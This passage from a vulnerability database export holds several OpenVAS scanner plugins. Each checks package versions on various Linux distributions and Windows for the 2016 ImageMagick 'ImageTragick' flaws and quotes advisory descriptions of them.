rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++-q16-12\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:37:57", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ImageMagick (EulerOS-SA-2016-1021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161021", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1021\");\n script_version(\"2020-01-23T10:38:28+0000\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:38:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:38:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ImageMagick (EulerOS-SA-2016-1021)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1021\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1021\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ImageMagick' package(s) announced via the EulerOS-SA-2016-1021 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.(CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\");\n\n script_tag(name:\"affected\", value:\"'ImageMagick' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851305", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851305\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:13 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1266-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-32bit\", rpm:\"libMagick++-6_Q16-3-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-3-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-32bit\", rpm:\"libMagickWand-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:26:09", "description": "The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-05T00:00:00", "type": "openvas", "title": "ImageMagick Multiple Vulnerabilities May16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310807568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ImageMagick Multiple Vulnerabilities May16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:imagemagick:imagemagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807568\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-05 14:06:00 +0530 (Thu, 05 May 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"ImageMagick Multiple Vulnerabilities May16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - Insufficient filtering for filename passed to delegate's command.\n\n - An error in ImageMagick's ephemeral pseudoprotocol.\n\n - An error in ImageMagick's msl pseudo protocol.\n\n - An error in ImageMagick's label pseudo protocol.\n\n - An SSRF vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, to delete arbitrary files, to move image\n files to file with any extension in any folder, to get content of the files\n from the server.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick versions before 6.9.3-10\n and 7.x before 7.0.1-1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ImageMagick version\n 6.9.3-10 or 7.0.1-1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/05/03/18\");\n script_xref(name:\"URL\", value:\"https://imagetragick.com\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_imagemagick_detect_win.nasl\");\n script_mandatory_keys(\"ImageMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!imVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:imVer, test_version:\"6.9.3.10\"))\n{\n fix = \"6.9.3.10\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:imVer, test_version:\"7.0.0\", test_version2:\"7.0.1.0\"))\n{\n fix = \"7.0.1.1\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:imVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851307", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851307\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:24 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1260-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "description": "Check the version of ImageMagick", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882483", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882483", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882483\");\n script_version(\"$Revision: 14058 $\");\n 